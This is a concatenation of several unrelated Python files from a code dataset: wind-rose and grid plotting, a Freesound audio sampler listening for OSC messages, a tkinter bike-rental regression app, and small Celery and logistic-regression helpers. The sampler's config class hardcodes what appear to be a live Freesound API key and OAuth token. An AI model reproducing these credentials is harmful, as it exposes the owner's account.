0.1, 0.8, 0.8]\n \tax = wr.WindroseAxes(fig, rect, axisbg='w')\n \tfig.add_axes(ax)\n \treturn ax\n\n outfilename='eklima_rose_Hovin_10MIN_25.png'\n ax = new_axes()\n ax.bar(w_H['direction'], w_H['speed'], opening=0.8, edgecolor='white', bins=np.arange(0.5, 15, 2))\n plt.title('Hovin - OBS - 25m', y=1.08, fontsize=16, fontweight='bold')\n #locc = plticker.MultipleLocator(base=500.0) # this locator puts ticks at regular intervals\n #ax.xaxis.set_major_locator(locc)\n ax.set_xlim(0,2500)\n ax.set_ylim(0,2500)\n ax.yaxis.set_ticks(np.arange(0,2500,500))\n ax.yaxis.set_ticklabels(np.arange(0,2500,500))\n ax.set_legend()\n ax.legend(loc='center left', bbox_to_anchor=(1, 0.3), title='Value [m/s]', fontsize=10)\n plt.savefig(outfilename)\n\n outfilename2='eklima_rose_Blindern_10MIN_26.png'\n ax2 = new_axes()\n ax2.bar(w_B['direction'], w_B['speed'], opening=0.8, edgecolor='white', bins=np.arange(0.5, 15, 2))\n plt.title('Blinder - OBS - 26.5m', y=1.08, fontsize=16, fontweight='bold')\n ax2.set_ylim(0,2500)\n ax2.set_xlim(0,2500)\n ax2.yaxis.set_ticks(np.arange(0,2500,500))\n ax2.yaxis.set_ticklabels(np.arange(0,2500,500))\n ax2.set_legend()\n ax2.legend(loc='center left', bbox_to_anchor=(1, 0.3), title='Value [m/s]', fontsize=10)\n plt.savefig(outfilename2)\n\n\n #plt.show()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"eklima_windrose_10MIN.py","file_name":"eklima_windrose_10MIN.py","file_ext":"py","file_size_in_byte":4375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"7318089","text":"# fs sampler\n# version: 0.1\n# Dieses Programm dient dazu anhand von spezifischen Parametern aus der online Library Free Sound Dateien zu selektieren und diese in ein Verzeichnis lokal runter zu laden\n\nfrom __future__ import print_function\nimport freesound\nimport os\nimport sys\nfrom oauthlib.oauth2 import BackendApplicationClient\nfrom requests_oauthlib import OAuth2Session\nimport hashlib\nimport random\nimport time\nimport subprocess\n\n# OSC\nfrom osc4py3.as_eventloop import *\nfrom osc4py3 import oscmethod as osm\n\nclass config():\n\t\"\"\"\n\tStart here to edit your config of the program\n\t\"\"\"\n\tAPIKEY=\"Ld15pPetuu7VMVOGEzgkrvTp23IaiplOUmuszK44\"\n\tOAUTHTOKEN=\"VegqtgKdHqbR0KwcElFha5FvC2vhhQ\"\n\tFETCHDIRNAME = \"fetchedSounds\"\n\tCOUNT = 10 #Maximale Anzahl der Sounds (-1 für unbegrenzt)\n\tPAGESIZE = 300 #Ergebnisse pro Abruf von Freesounds INT (Seitenbasiert, Seite n kann spezifiziert werden)\n\tDEBUG = True\n\tMINSOUNDDURATION = 1\n\tMAXSOUNDDURATION = 30\n\nclass fsFetcher():\n\tdef __init__(self):\n\t\tself.fsClient = freesound.FreesoundClient()\n\t\tself.fsClient.set_token(config.APIKEY)\n\t\t#programm status (True = weiter arbeiten, False = Fehler)\n\t\tself.state = False\n\n\tdef createDirs(self):\n\t\tself.path_name = os.path.join(os.getcwd(), config.FETCHDIRNAME)\n\t\tif config.DEBUG:\n\t\t\tprint (\"directory path:\")\n\t\t\tprint(self.path_name)\n\t\ttry:\n\t\t\tif config.DEBUG:\n\t\t\t\tprint(\"creating dir for previews...\")\n\t\t\tos.mkdir(self.path_name)\n\t\texcept (FileExistsError):\n\t\t\tif config.DEBUG:\n\t\t\t\tprint (\"dir already created, skipping\")\n\t\texcept:\n\t\t\tif config.DEBUG:\n\t\t\t\tprint (\"cannot create folder: \"+self.path_name+\" ! Cannot continue\")\n\t\t\treturn False\n\t\ttry:\n\t\t\tif config.DEBUG:\n\t\t\t\tprint (\"creating dir for wave files...\")\n\t\t\tos.mkdir(self.path_name+'/wav')\n\t\texcept (FileExistsError):\n\t\t\tif config.DEBUG:\n\t\t\t\tprint (\"dir already created, skipping\")\n\t\texcept:\n\t\t\tif config.DEBUG:\n\t\t\t\tprint (\"cannot create folder: \"+self.path_name+\"/wav ! Cannot continue\")\n\t\t\treturn False\n\t\tself.state = True\n\t\treturn True\n\n\tdef md5(self,fname):\n\t hash_md5 = hashlib.md5()\n\t with open(fname, \"rb\") as f:\n\t for chunk in iter(lambda: f.read(4096), b\"\"):\n\t hash_md5.update(chunk)\n\t return hash_md5.hexdigest()\t\n\n\tdef selectSounds(self, minDuration=config.MINSOUNDDURATION, maxDuration=config.MAXSOUNDDURATION, geo=[-10,52,4000]):\n\t\t\"\"\"\n\t\tDiese Methode wählt Sounds aufgrund folgender Parameter aus der Freesound Library\n\t\tParameter: minimale Dauer, maximale Dauer, Geotags: Breitengrad, Längengrad, Entfernung (Radius) als INT\n\t\t\t\t\n\t\tText Search Request:\n >>> sounds = c.text_search(\n >>> query=\"dubstep\", filter=\"tag:loop\", fields=\"id,name,url\"\n >>> )\n >>> for snd in sounds: print snd.name\n\n\t\tGeotag Filter:\n\t\t\t#filter={!geofilt sfield=geotag pt=, d=}\n\t\t\"\"\"\n\t\tif not (self.state):\n\t\t\treturn False\n\t\tif config.DEBUG:\n\t\t\tprint (\"fetching sound data from freesounds\")\n\t\t\tprint (\"geotags:\")\n\t\t\tprint (geo)\n\t\tsoundGeoTagging = geo\n\t\tstart = time.time()\n\t\tqueryFilter = \"{{!geofilt sfield=geotag pt={0},{1} d={2}}}\".format(geo[0],geo[1],geo[2])\n\t\t#queryFilter = \"type:wav {!geofilt sfield=geotag pt=13,52 d=2000}\"\n\t\tqueryFields =\"id,name,duration,md5,type,previews\"\n\t\tsounds = self.fsClient.text_search(filter=queryFilter,fields=queryFields, page_size=config.PAGESIZE)\n\t\tstop = time.time()\n\t\tif config.DEBUG:\n\t\t\tprint (\"dauer für freesounds abruf: \")\n\t\t\tprint (stop-start)\n\t\treturn self.filterByDuration(sounds, minDuration, maxDuration)\n\n\tdef downloadSounds(self, soundsObject):\n\t\tif not (self.state):\n\t\t\treturn False\n\t\t#self.fsClient.set_token(config.OAUTHTOKEN, \"oauth\")\n\t\t\"\"\"\n\t\tDownload Sound Files\n\t\tErwartet ein Sound Objekt mit einer Liste von Sounds\n\t\t\"\"\"\n\t\ti = 0\n\t\tfor sound in soundsObject:\n\t\t\tif (i >= 0) & (i < config.COUNT):\n\t\t\t\tself.nameFileByIndex(sound, i)\n\t\t\t\t#filename = \"sound_\"+str(i)+\".wav\"\n\t\t\t\t#sound.retrieve_preview(self.path_name, name=filename)\n\t\t\t\ti += 1\n\t\t\telse:\n\t\t\t\treturn\n\t\treturn\n\tdef nameFileByIndex(self, soundObject, i):\n\t\tif not (self.state):\n\t\t\treturn False\n\t\tfilename = \"sound_\"+str(i)\n\t\tif config.DEBUG:\n\t\t\tprint(\"\\t\\tDownloading:\", soundObject.name)\n\t\t\tprint(\"as: \"+filename)\n\t\tsoundObject.retrieve_preview(self.path_name, name=filename)\n\t\t\"\"\"\n\t\tLoglevel ffmpeg\n\t\t\t-loglevel [repeat+]loglevel | -v [repeat+]loglevel\n\t\t\tSet the logging level used by the library.\n\t\t\t‘quiet, -8’\n\t\t\tShow nothing at all; be silent.\n\t\t\t‘panic, 0’\n\t\t\tOnly show fatal errors which could lead the process to crash, such as an assertion failure. This is not currently used for anything.\n\t\t\t‘fatal, 8’\n\t\t\tOnly show fatal errors. These are errors after which the process absolutely cannot continue.\n\t\t\t‘error, 16’\n\t\t\tShow all errors, including ones which can be recovered from.\n\t\t\t‘warning, 24’\n\t\t\tShow all warnings and errors. Any message related to possibly incorrect or unexpected events will be shown.\n\t\t\t‘info, 32’\n\t\t\tShow informative messages during processing. This is in addition to warnings and errors. This is the default value.\n\t\t\t‘verbose, 40’\n\t\t\tSame as info, except more verbose.\n\t\t\t‘debug, 48’\n\t\t\tShow everything, including debugging information.\n\t\t\t‘trace, 56’\n\t\t\"\"\"\n\t\tsubprocess.call(['ffmpeg','-v', 'warning', '-y', '-i', self.path_name+'/'+filename,self.path_name+'/wav/'+filename+'.wav'])\n\t\treturn\n\n\tdef nameFileByName(self, soundObject):\n\t\tif not (self.state):\n\t\t\treturn False\n\t\tfullfilepath = self.path_name+\"/\"+soundObject.name\n\t\tif (os.path.isfile(fullfilepath)):\n\t\t\tif config.DEBUG:\n\t\t\t\tprint (\"dateiname vorhanden: \"+soundObject.name)\n\t\telse:\n\t\t\tif config.DEBUG:\n\t\t\t\tprint (\"datei muss geladen werden:\")\n\t\t\t\tprint(\"\\t\\tDownloading:\", soundObject.name)\n\t\t\t#if sound.name.endswith(sound.type):\n\t\t\tfilename = soundObject.name\n\t\t\tsoundObject.retrieve_preview(self.path_name, name=filename)\n\t\t\t#else:\n\t\t\t#\tfilename = \"%s.%s\" % (sound.name, sound.type)\n\t\t\t#\tsound.retrieve_preview(self.path_name, name=filename)\n\t\treturn\n\n\tdef filterByDuration(self, soundsObject, minDuration, maxDuration):\n\t\tif not (self.state):\n\t\t\treturn False\n\t\tsounds = soundsObject\n\t\tsoundList = []\n\t\ttmp = time.time()\n\t\tfor sound in sounds:\n\t\t\tsoundList += [sound]\n\t\trandom.shuffle(soundList)\n\t\tfilteredObjects = []\n\t\ti = 0\n\t\tif config.DEBUG:\n\t\t\tprint (\"dauer für shuffle: \")\n\t\t\tprint (time.time()-tmp)\n\t\t\tprint (\"Preselected Sounds:\")\n\t\t\tprint (soundList)\n\t\tfor sound in soundList:\n\t\t\tif (i >= 0) & (i < config.COUNT):\n\t\t\t\tif (int(sound.duration) >= minDuration) & (int(sound.duration) <= maxDuration):\n\t\t\t\t\tfilteredObjects += [sound]\n\t\t\t\t\ti += 1\n\t\tif config.DEBUG:\n\t\t\tprint (\"selected sounds after filtering:\")\n\t\t\tprint (filteredObjects)\n\t\treturn filteredObjects\n\nclass OSCListener():\n\tdef __init__(self):\n\t\tself.serverip = \"127.0.0.1\"\n\t\tself.port = 12005\n\t\t#Programaufruf\n\t\tself.soundFetcher = fsFetcher()\n\t\tself.soundFetcher.createDirs()\n\tdef handlerForWLR(self, x, y, z):\n\t\t# Will receive message data unpacked in x,yz\n\t\t# Koordignatenaufruf, Download\n\t\tsounds = self.soundFetcher.selectSounds(geo=[x,y,z])\n\t\tdownload = self.soundFetcher.downloadSounds(sounds)\n\n\n\tdef startup(self):\n\t\t# Start the system.\n\t\tif config.DEBUG:\n\t\t\tprint(\"starting up Server...\")\n\t\tosc_startup()\n\n\t\t# Make server channels to receive packets.\n\t\tosc_udp_server(self.serverip, self.port, \"aservername\")\n\n\t\t# Associate Python functions with message address patterns, using default\n\t\t# argument scheme OSCARG_DATAUNPACK.\n\t\tosc_method(\"/incommingWLR*\", self.handlerForWLR)\n\t\tif config.DEBUG:\n\t\t\tprint(\"listening...\")\n\n\tdef shutdown(self):\n\t\tosc_terminate()\n\n\tdef listenLoop(self):\n\t\t# Periodically call osc4py3 processing method in your event loop.\n\t\tfinished = False\n\t\ttry:\n\t\t\twhile not finished:\n\t\t\t\tosc_process()\n\t\texcept KeyboardInterrupt:\n\t\t\t# Properly close the system.\n\t\t\tfinished = True\n\t\t\tself.shutdown()\n\t\t\tpass\n\t\texcept Exception as e:\n\t\t\tself.shutdown()\n\t\t\tprint (e)\n\t\n\nappStart = time.time()\n\nserver = OSCListener()\nserver.startup()\nserver.listenLoop()\n\nappStop = time.time()\nprint (\"App runtime: \")\nprint (appStop - appStart)\n","sub_path":"py/newPy5/fsSampler (5).py","file_name":"fsSampler (5).py","file_ext":"py","file_size_in_byte":8012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"311152875","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport tkinter as tk \nfrom tkinter import messagebox,simpledialog,filedialog\nfrom tkinter import *\nimport tkinter\nfrom imutils import paths\nfrom tkinter.filedialog import askopenfilename\n\nimport numpy as np\nimport pandas as pd\nfrom matplotlib import pyplot as plt\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.feature_selection import SelectFromModel\nfrom sklearn import metrics\nfrom sklearn.model_selection import train_test_split,KFold,cross_val_score,GridSearchCV\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.neighbors import KNeighborsRegressor\nfrom sklearn.svm import SVR\nfrom sklearn.ensemble import RandomForestRegressor\n\nimport warnings\nwarnings.filterwarnings('ignore')\n\n\n# In[2]:\n\n\nroot= tk.Tk() \nroot.title(\"Bike renting analysis\")\nroot.geometry(\"1300x1200\")\n\n\n# In[ ]:\n\n\nglobal df_hour, df_day\ndef upload_data1():\n global df_hour\n df_hour = askopenfilename(initialdir = \"Dataset\")\n #pathlabel.config(text=train_data)\n text.insert(END,\"Dataset loaded\\n\\n\")\n \ndef upload_data2():\n global df_day\n text.delete('1.0',END)\n df_day = askopenfilename(initialdir = \"Dataset\")\n #pathlabel1.config(text=test_data)\n text.insert(END,\"New Dataset loaded\\n\\n\")\n \ndef data():\n global df_hour,df_day,df\n text.delete('1.0',END)\n df_hour = pd.read_csv(\"hour.csv\")\n df_day = pd.read_csv(\"day.csv\")\n df_hour.drop('instant',axis=1,inplace=True)\n df=pd.merge(df_day,df_hour,how='left',left_on='dteday',right_on='dteday')\n text.insert(END,\"Top FIVE rows of the Dataset\\n\\n\")\n text.insert(END,df.head())\n text.insert(END,\"column names\\n\\n\")\n text.insert(END,df.columns)\n text.insert(END,\"Total no. of rows and coulmns\\n\\n\")\n text.insert(END,df.shape)\ndef statistics():\n text.delete('1.0',END)\n text.insert(END,\"Top FIVE rows of the Dataset\\n\\n\")\n text.insert(END,df.head())\n stats=df.describe()\n text.insert(END,\"\\n\\nStatistical Measurements for Data\\n\\n\")\n text.insert(END,stats)\n null=df.isnull().sum()\n text.insert(END,null) \ndef train_test():\n text.delete('1.0',END)\n global x,y\n global x_train,x_test,y_train,y_test\n text.delete('1.0',END)\n x=df.drop(['dteday','cnt_y'],axis=1)\n y=df['cnt_y']\n x_train,x_test,y_train,y_test=train_test_split(x,y,test_size=0.2,random_state=25)\n text.insert(END,\"Train and Test model Generated\\n\\n\")\n text.insert(END,\"Total Dataset Size : \"+str(len(df))+\"\\n\")\n text.insert(END,\"Training Size : \"+str(len(x_train))+\"\\n\")\n text.insert(END,\"Test Size : \"+str(len(x_test))+\"\\n\")\n return x_train,x_test,y_train,y_test \n\ndef LR():\n text.delete('1.0',END)\n lm=LinearRegression()\n lm.fit(x_train,y_train)\n predictions=lm.predict(x_test)\n res = pd.DataFrame(predictions)\n res.to_csv(\"prediction_results.csv\")\n res['season_x']=x['season_x']\n #res.index = X_test.index # its important for comparison\n res['predictions'] = predictions\n res.to_csv(\"LRprediction_results.csv\")\n MAE= metrics.mean_absolute_error(y_test,predictions)\n MSE=metrics.mean_squared_error(y_test,predictions)\n RMS= np.sqrt(metrics.mean_squared_error(y_test,predictions))\n r_square = metrics.r2_score(y_test,predictions)\n text.insert(END,\"Error Rate evaluation\\n\\n\")\n text.insert(END,\"mean absolute error : \"+str(MAE)+\"\\n\")\n text.insert(END,\"mean squared error: \"+str(MSE)+\"\\n\")\n text.insert(END,\"root mean squared error : \"+str(RMS)+\"\\n\")\n text.insert(END,\"R_square: \"+str(r_square)+\"\\n\")\n text.insert(END,\"Predicted Values on Test Data: \"+str(predictions)+\"\\n\")\n text.insert(END,\"\\n\\nFinal Predicted values on New Data:\\n\\n\")\n text.insert(END,res)\n text.insert(END,\"\\n\\nCheck the Project Directory for Submission CSV file\\n\\n\")\n text.insert(END,\"@@@------------------Thank You--------------------@@@\")\n \n \ndef KNN():\n text.delete('1.0',END)\n regressor = KNeighborsRegressor()\n regressor.fit(x_train, y_train)\n predictions = regressor.predict(x_test)\n res = pd.DataFrame(predictions)\n res.to_csv(\"KNNprediction_results.csv\")\n res['season_x']=x['season_x']\n #res.index = X_test.index # its important for comparison\n res['predictions'] = predictions\n res.to_csv(\"prediction_results.csv\")\n MAE= metrics.mean_absolute_error(y_test,predictions)\n MSE=metrics.mean_squared_error(y_test,predictions)\n RMS= np.sqrt(metrics.mean_squared_error(y_test,predictions))\n r_square = metrics.r2_score(y_test,predictions)\n text.insert(END,\"Error Rate evaluation\\n\\n\")\n text.insert(END,\"mean absolute error : \"+str(MAE)+\"\\n\")\n text.insert(END,\"mean squared error: \"+str(MSE)+\"\\n\")\n text.insert(END,\"root mean squared error : \"+str(RMS)+\"\\n\")\n text.insert(END,\"R_square: \"+str(r_square)+\"\\n\")\n text.insert(END,\"Predicted Values on Test Data: \"+str(predictions)+\"\\n\")\n text.insert(END,\"\\n\\nFinal Predicted values on New Data:\\n\\n\")\n text.insert(END,res)\n text.insert(END,\"\\n\\nCheck the Project Directory for Submission CSV file\\n\\n\")\n text.insert(END,\"@@@------------------Thank You--------------------@@@\")\n \ndef RFT():\n text.delete('1.0',END)\n global new_x_test,new_x_train,y_train\n \n regressor = RandomForestRegressor(max_depth=5,n_estimators = 10, random_state = 0)\n regressor.fit(x_train, y_train)\n features = pd.DataFrame()\n features['Feature'] = x_train.columns\n features['Importance'] = regressor.feature_importances_\n features.sort_values(by=['Importance'], ascending=False, inplace=True)\n features.set_index('Feature', inplace=True)\n text.insert(END,\"Selected Important Features Automatically by using *feature_importances_* & *SelectFromModel*\\n\\n\")\n text.insert(END,features[:3])\n selector = SelectFromModel(regressor, prefit=True)\n train_reduced = selector.transform(x_train)\n new_x_train=pd.DataFrame(train_reduced,columns=['registered_y','casual_y'])\n test_reduced = selector.transform(x_test)\n new_x_test=pd.DataFrame(test_reduced,columns=['registered_y','casual_y'])\n #new_reduced=selector.transform(New_data)\n #new_data=pd.DataFrame(new_reduced,columns=['registered_y','casual_y','casual_x'])\n parameters = {'bootstrap': False,\n 'min_samples_leaf': 3,\n 'n_estimators': 10,\n 'min_samples_split': 6,\n 'max_features': 'sqrt',\n 'max_depth': 5}\n\n rf = RandomForestRegressor(**parameters)\n rf.fit(new_x_train, y_train)\n predictions=rf.predict(new_x_test)\n \n \n \n res = pd.DataFrame(predictions)\n res.to_csv(\"prediction_results.csv\")\n res['season_x']=x['season_x']\n #res.index = X_test.index # its important for comparison\n res['predictions'] = predictions\n res.to_csv(\"RFTprediction_results.csv\")\n MAE= metrics.mean_absolute_error(y_test,predictions)\n MSE=metrics.mean_squared_error(y_test,predictions)\n RMS= np.sqrt(metrics.mean_squared_error(y_test,predictions))\n r_square = metrics.r2_score(y_test,predictions)\n text.insert(END,\"Error Rate evaluation\\n\\n\")\n text.insert(END,\"mean absolute error : \"+str(MAE)+\"\\n\")\n text.insert(END,\"mean squared error: \"+str(MSE)+\"\\n\")\n text.insert(END,\"root mean squared error : \"+str(RMS)+\"\\n\")\n text.insert(END,\"R_square: \"+str(r_square)+\"\\n\")\n text.insert(END,\"Predicted Values on Test Data: \"+str(predictions)+\"\\n\")\n text.insert(END,\"\\n\\nFinal Predicted values on New Data:\\n\\n\")\n text.insert(END,res)\n text.insert(END,\"\\n\\nCheck the Project Directory for Submission CSV file\\n\\n\")\n text.insert(END,\"@@@------------------Thank You--------------------@@@\")\n \ndef lasso():\n # Lasso\n text.delete('1.0',END)\n from sklearn.linear_model import Lasso\n lassoReg = Lasso(alpha=0.1, normalize=True)\n lassoReg.fit(x_train,y_train)\n predictions = lassoReg.predict(x_test)\n res = pd.DataFrame(predictions)\n res.to_csv(\"lassoprediction_results.csv\")\n res['season_x']=x['season_x']\n #res.index = X_test.index # its important for comparison\n res['predictions'] = predictions\n res.to_csv(\"prediction_results.csv\")\n MAE= metrics.mean_absolute_error(y_test,predictions)\n MSE=metrics.mean_squared_error(y_test,predictions)\n RMS= np.sqrt(metrics.mean_squared_error(y_test,predictions))\n r_square = metrics.r2_score(y_test,predictions)\n \n text.insert(END,\"Error Rate evaluation\\n\\n\")\n text.insert(END,\"mean absolute error : \"+str(MAE)+\"\\n\")\n text.insert(END,\"mean squared error: \"+str(MSE)+\"\\n\")\n text.insert(END,\"root mean squared error : \"+str(RMS)+\"\\n\")\n text.insert(END,\"R_square: \"+str(r_square)+\"\\n\")\n text.insert(END,\"Predicted Values on Test Data: \"+str(predictions)+\"\\n\")\n text.insert(END,\"\\n\\nFinal Predicted values on New Data:\\n\\n\")\n text.insert(END,res)\n text.insert(END,\"\\n\\nCheck the Project Directory for Submission CSV file\\n\\n\")\n text.insert(END,\"@@@------------------Thank You--------------------@@@\")\n\ndef input_values():\n text.delete('1.0',END)\n global new_x_train,new_x_test\n global RFT\n \n \n global registered_y#our 2nd input variable\n registered_y = float(entry1.get())\n\n global casual_y \n casual_y = float(entry2.get())\n\n #global casual_x\n #casual_x = float(entry3.get())\n\n list1=[[registered_y,casual_y]]\n parameters = {'bootstrap': False,\n 'min_samples_leaf': 3,\n 'n_estimators': 50,\n 'min_samples_split': 10,\n 'max_features': 'sqrt',\n 'max_depth': 6}\n \n sc_X = StandardScaler()\n x_train = sc_X.fit_transform(new_x_train)\n x_test = sc_X.transform(new_x_test)\n rf = RandomForestRegressor(**parameters)\n rf.fit(x_train, y_train)\n Prediction_result = rf.predict(list1)\n text.insert(END,\"New values are predicted from Random Forest Regressor\\n\\n\")\n text.insert(END,\"Predicted cnt_y for the New inputs\\n\\n\")\n text.insert(END,Prediction_result)\n\n \nfont = ('times', 14, 'bold')\ntitle = Label(root, text='Bike renting Using Machine Learning') \ntitle.config(font=font) \ntitle.config(height=2, width=120) \ntitle.place(x=0,y=5)\n\nfont1 = ('times',13 ,'bold')\nbutton1 = tk.Button (root, text='Upload Data1',width=13,command=upload_data1) \nbutton1.config(font=font1)\nbutton1.place(x=60,y=100)\n\nbutton2 = tk.Button (root, text='Upload Data2',width=13,command=upload_data2)\nbutton2.config(font=font1)\nbutton2.place(x=60,y=150)\n\nbutton3 = tk.Button (root, text='Data',width=13,command=data) \nbutton3.config(font=font1)\nbutton3.place(x=60,y=200)\n\n\nbutton4 = tk.Button (root, text='statistics',width=13,command=statistics)\nbutton4.config(font=font1) \nbutton4.place(x=60,y=250)\n\nbutton5 = tk.Button (root, text='Train & Test',width=13,command=train_test)\nbutton5.config(font=font1) \nbutton5.place(x=60,y=300)\n\ntitle = Label(root, text='Application of ML models')\n#title.config(bg='RoyalBlue2', fg='white') \ntitle.config(font=font1) \ntitle.config(width=25) \ntitle.place(x=250,y=70)\n\nbutton6 = tk.Button (root, text='Linear Regression',width=15,bg='pale green',command=LR)\nbutton6.config(font=font1) \nbutton6.place(x=300,y=100)\n\nbutton7 = tk.Button (root, text='KNN',width=15,bg='sky blue',command=KNN)\nbutton7.config(font=font1) \nbutton7.place(x=300,y=150)\n\nbutton8 = tk.Button (root, text='RFT',width=15,bg='orange',command=RFT)\nbutton8.config(font=font1) \nbutton8.place(x=300,y=200)\n\nbutton9 = tk.Button (root, text='Lasso',width=15,bg='violet',command=lasso)\nbutton9.config(font=font1) \nbutton9.place(x=300,y=250)\n\n\n\ntitle = Label(root, text='Enter Input values for the New Prediction')\ntitle.config(bg='black', fg='white') \ntitle.config(font=font1) \ntitle.config(width=40) \ntitle.place(x=60,y=380)\n\nfont3=('times',9,'bold')\ntitle1 = Label(root, text='*You Should enter scaled values between 0 and 1')\n \ntitle1.config(font=font3) \ntitle1.config(width=40) \ntitle1.place(x=50,y=415)\n\ndef clear1(event):\n entry1.delete(0, tk.END)\n\nfont2=('times',10)\nentry1 = tk.Entry (root) # create 1st entry box\nentry1.config(font=font2)\nentry1.place(x=60, y=450,height=30,width=150)\nentry1.insert(0,'registered_y')\nentry1.bind(\"\",clear1)\n\ndef clear2(event):\n entry2.delete(0, tk.END)\n\nfont2=('times',10)\nentry2 = tk.Entry (root) # create 1st entry box\nentry2.config(font=font2)\nentry2.place(x=315, y=450,height=30,width=150)\nentry2.insert(0,'casual_y')\nentry2.bind(\"\",clear2)\n\n\n\nPrediction = tk.Button (root, text='Prediction',width=15,fg='white',bg='green',command=input_values)\nPrediction.config(font=font1) \nPrediction.place(x=180,y=550)\n\n\n\nfont1 = ('times', 11, 'bold')\ntext=Text(root,height=32,width=90)\nscroll=Scrollbar(text)\ntext.configure(yscrollcommand=scroll.set,xscrollcommand=scroll.set)\ntext.place(x=550,y=70)\ntext.config(font=font1)\n\nroot.mainloop()\n\n\n","sub_path":"Bike_renting_analysis/bike_renting.py","file_name":"bike_renting.py","file_ext":"py","file_size_in_byte":12936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"68786271","text":"from sigmoid import sigmoid\n\n\ndef predict(theta, x, y):\n \"\"\"\n Gives the accuracy of the model based on the theta parameters.\n\n Parameters\n ----------\n theta : array_like\n Shape (1, n+1). Parameter values for function.\n\n x : array_like\n Shape (m, n+1). Features in model.\n\n y : array_like\n Shape (m, 1). Labels for each example.\n\n Returns\n -------\n accuracy : int\n Percentage of correct model predictions.\n \"\"\"\n\n correct = 0\n\n probability = sigmoid(x @ theta.T)\n predictions = [1 if x >= 0.5 else 0 for x in probability]\n\n for i in range(len(y)):\n if predictions[i] == y[i]:\n correct += 1\n accuracy = int((correct / len(y)) * 100)\n return accuracy\n","sub_path":"logistic-regression/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"335560597","text":"from celery import Celery\nfrom download import download_comics\n\napp = Celery(\"app\")\napp.config_from_object(\"celeryconfig\")\n\n\n@app.on_after_configure.connect\ndef setup_periodic_tasks(sender, **kwargs):\n sender.add_periodic_task(3600.0, download_task.s())\n\n\n@app.task\ndef download_task():\n print(\"Execute download task\")\n download_comics()\n","sub_path":"task2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"37478833","text":"n=int(input(\"Please input a positive integer number larger than 2.:\\n\"))\r\nr=2\r\nwhile n>1:\r\n if (n%r==0):\r\n print(\"It is a not prime number.\")\r\n break\r\n else:\r\n r=r+1\r\n if (r>n):\r\n print(\"It is a prime number.\")\r\n break\r\n \r\n \r\n","sub_path":"L2/L2_Q1.py","file_name":"L2_Q1.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"564218560","text":"# Purpose: Simple Image Plotting of Numpy Matrices\n#\n# Info: A set of of functions for simple plotting in Matplotlib\n# - include example plot function to inspect functionality\n#\n# Developed as part of the Software Agents Course at City University\n#\n# Dev: Dan Dixey and Enrico Lopedoto\n#\n#\nimport logging\nimport os\n\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nimport Plotting\n\nmatplotlib.style.use('ggplot')\n\n\nclass Plotting_tracks(object):\n \"\"\"\n\n Simple Image Plotting of Numpy Matrices\n\n \"\"\"\n\n def __init__(self):\n logging.debug(\"Loaded Plotting Function\")\n\n @staticmethod\n def example():\n \"\"\" To run the example on Command Line:\n\n Input\n #####\n import Plotting\n Plotting_track().example()\n\n Output\n ######\n Saved plot in directory\n Plot Show in new window\n\n \"\"\"\n fig, ax = plt.subplots()\n\n image = np.random.uniform(size=(10,\n 10)) # Plotting Matrix\n\n ax.imshow(image,\n cmap=plt.get_cmap('RdGy'),\n interpolation='nearest')\n\n # Set the title\n ax.set_title('Example Grid')\n\n # Move left and bottom spines outward by 10 points\n ax.spines['left'].set_position(('outward', 10))\n ax.spines['bottom'].set_position(('outward', 10))\n\n # Hide the right and top spines\n ax.spines['right'].set_visible(False)\n ax.spines['top'].set_visible(False)\n\n # Only show ticks on the left and bottom spines\n ax.yaxis.set_ticks_position('left')\n ax.xaxis.set_ticks_position('bottom')\n\n name = 'grid_world.png'\n plt.savefig(os.path.join(os.getcwd(),\n 'Model',\n 'Obstacle_Img',\n name))\n plt.show()\n\n @staticmethod\n def plot_grid(matrix, name, folder):\n \"\"\" Plot Grid function will attempt to plot a matrix\n\n Input\n #####\n numpy matrix\n\n Output\n ######\n Saved plot in directory\n Plot Show in new window\n\n \"\"\"\n if isinstance(matrix, np.ndarray):\n plt.ioff()\n fig, ax = plt.subplots()\n image = matrix\n ax.imshow(image,\n cmap=plt.get_cmap('gnuplot'),\n interpolation='nearest')\n\n # Set the title\n ax.set_title('Plot of {}'.format(name))\n\n # Move left and bottom spines outward by 10 points\n ax.spines['left'].set_position(('outward', 10))\n ax.spines['bottom'].set_position(('outward', 10))\n\n # Hide the right and top spines\n ax.spines['right'].set_visible(False)\n ax.spines['top'].set_visible(False)\n\n # Only show ticks on the left and bottom spines\n ax.yaxis.set_ticks_position('left')\n ax.xaxis.set_ticks_position('bottom')\n\n # Save and Show Plot\n name = name + '.png'\n plt.savefig(os.path.join(os.getcwd(),\n 'Model',\n folder,\n name))\n\n return name\n\n else:\n logging.error(\"Data provided was not a Matrix\")\n return 'Error'\n\n\nclass plotting_model(object):\n \"\"\"\n\n Plotting the Q-Matrix from model [1, 2]\n\n \"\"\"\n\n def __init__(self):\n self.DF = None\n self.Q_Matrix = None\n self.DF_new = None\n self.Q = None\n\n def get_q_matrix(self, model_q=None, nb_actions=None):\n \"\"\"\n Function to Generate the Reward Matrix\n\n :param model_q: dict\n :param nb_actions: int\n :return: None\n \"\"\"\n assert isinstance(model_q, dict) and isinstance(nb_actions, int), \\\n \"Object Types not as Expected\"\n\n self.Q = model_q\n length = len(model_q)\n splitting_keys = list(model_q)\n self.Q_Matrix = np.zeros((length, nb_actions))\n\n for val, key in enumerate(splitting_keys):\n self.Q_Matrix[val][key[1]] = model_q[key]\n\n def plot_q_matrix(self, f_name):\n \"\"\"\n Plot the R-Matrix\n\n :param 